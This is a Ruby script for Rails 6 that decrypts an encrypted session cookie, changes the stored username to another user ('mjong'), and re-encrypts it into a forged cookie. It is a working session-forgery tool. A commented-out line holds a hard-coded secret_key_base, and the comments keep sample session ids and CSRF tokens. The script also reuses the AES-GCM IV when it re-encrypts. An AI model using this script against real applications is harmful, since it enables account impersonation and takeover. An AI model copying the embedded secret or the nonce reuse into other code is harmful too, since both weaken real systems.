rails 6 decrypt_encrypt_cookie.rb

require 'base64'
require 'openssl'
require 'uri'
require 'json'
require 'pry'
require 'cgi'
#cookie = "aDkxgmW4kaxoXBGnjxAaBY7D47WUOveFdeai5kk2hHlYVqDo7xtzZJup5euTdH5ja5iOt37MMS4SVXQT5RteaZjvpdlA%2FLQi7IYSPZLz--2A6LCUu%2F5AsLfSez--QD%2FwiA2t8QQrKk6rrROlPQ%3D%3D"
cookie = ARGV[0]

def decrypt_and_encrypt_cookie(cookie)
  cookie = URI.unescape(cookie)
  data, iv, auth_tag = cookie.split("--").map do |v|
    Base64.strict_decode64(v)
  end


  cipher = OpenSSL::Cipher.new("aes-256-gcm")

  # Compute the encryption key
  secret_key_base = '' ||  Rails.application.secret_key_base
  secret = OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, "authenticated encrypted cookie", 1000, cipher.key_len)

  # Setup cipher for decryption and add inputs
  cipher.decrypt
  cipher.key = secret
  cipher.iv  = iv
  cipher.auth_tag = auth_tag
  cipher.auth_data = ""


  # Perform decryption
  cookie_payload = cipher.update(data)
  cookie_payload << cipher.final
  cookie_payload = JSON.parse cookie_payload
  # => {"_rails"=>{"message"=>"InRva2VuIg==", "exp"=>nil, "pur"=>"cookie.remember_token"}}

  puts "original_cookie : #{cookie_payload}"
  puts "\n"
  puts "\n"
  puts "\n"
  # Decode Base64 encoded stored data
  decoded_stored_value = Base64.decode64 cookie_payload["_rails"]["message"]
  stored_value = JSON.parse decoded_stored_value

  puts "original_message : #{stored_value}"
  puts "\n"
  puts "\n"
  puts "\n"

  #stored_value['username'] = 'admin'
  #{"session_id"=>"23e5ff760739d72964b37c6bd7a46fe6", "_csrf_token"=>"SvRoy0INX9tY2hibijqfJtaTFa2RLXoP4RGbJU4FhmE="}
  #{"session_id"=>"f67bc204b8777bfed362a4e785b977f9", "_csrf_token"=>"CKQhzAg1RpEENcxJuYwveQVYBqMPqPqy0Z//7hvvZQQ="}
  stored_value = {"session_id"=>"f67bc204b8777bfed362a4e785b977f9", "_csrf_token"=>"CKQhzAg1RpEENcxJuYwveQVYBqMPqPqy0Z//7hvvZQQ=", "username"=>"ankit", "expiry_timestamp"=>1635577737, "password_expiry_timestamp"=>163753633, "auth_method" => 'db'}
  stored_value['username'] = 'mjong'
  #stored_value['expiry_timestamp'] = 1635577737
  #stored_value['password_expiry_timestamp'] = 163753633

  new_message = stored_value

  puts "new_message: #{new_message}"

  base64_message = Base64.strict_encode64(new_message.to_json)

  cookie_payload['_rails']['message'] = base64_message
  new_cookie = cookie_payload

  puts "new_cookie_payload: #{new_cookie}"
  puts "\n"
  puts "\n"
  puts "\n"

  cipher = OpenSSL::Cipher.new("aes-256-gcm")

  # Compute the encryption key
  #secret_key_base = Rails.application.secret_key_base
  #secret_key_base = '06b7592085f9762a3993d419aef45ea60cfe4fb813ff2fab35bfff736bc50efe939434f22ec1ee45618cbf60ed244d9b153ec19fa831bd05a72f39f49d399e0c'
  secret = OpenSSL::PKCS5.pbkdf2_hmac_sha1(secret_key_base, "authenticated encrypted cookie", 1000, cipher.key_len)
  cipher.encrypt
  cipher.key = secret
  cipher.iv  = iv
  cipher.auth_data = ""

  #old_cookie = Base64.encode64(cipher.update(cookie_payload.to_json))
  #puts old_cookie, 222

  #iv = cipher.random_iv

  encrypted_data = cipher.update(new_cookie.to_json)
  encrypted_data << cipher.final

  blob = "#{::Base64.strict_encode64 encrypted_data}--#{::Base64.strict_encode64 iv}"
  blob = "#{blob}--#{::Base64.strict_encode64 cipher.auth_tag}"
  blob
end

cookie =  decrypt_and_encrypt_cookie(cookie)
cookie = CGI.escape(cookie)
puts "new : #{cookie}"
puts "\n"
puts "\n"
puts "\n"

#decrypt_and_encrypt_cookie(cookie)